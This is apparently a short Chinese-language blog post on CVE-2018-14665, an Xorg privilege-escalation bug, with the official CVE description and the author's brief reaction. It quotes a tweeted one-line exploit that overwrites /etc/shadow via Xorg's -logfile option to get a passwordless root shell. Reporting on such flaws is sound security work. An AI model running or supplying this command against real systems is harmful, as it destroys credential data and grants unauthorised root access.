CVE-2018-14665：setuid 複寫檔案的 security issue...

摘要： 在Twitter 上看到的 security issue，好久沒在這麼普及的軟體上看到這種 bug 了： #CVE -2018-14665 - a LPE exploit viahttps://t.co/eax3fvaAjE fits in a...

在ofollow,noindex" target="_blank">Twitter 上看到的 security issue，好久沒在這麼普及的軟體上看到這種 bug 了：

CVE?src=hash&ref_src=twsrc%5Etfw" rel="nofollow,noindex" target="_blank">#CVE -2018-14665 - a LPE exploit viahttps://t.co/eax3fvaAjE fits in a tweet

cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su

Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.

— Hacker Fantastic (@hackerfantastic)October 25, 2018

在CVE - CVE-2018-14665 的說明裡面有提到 1.20.3 前的版本都有中，但沒講到從哪個版本開始，看起來是全系列...？

A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.

這一臉 orz...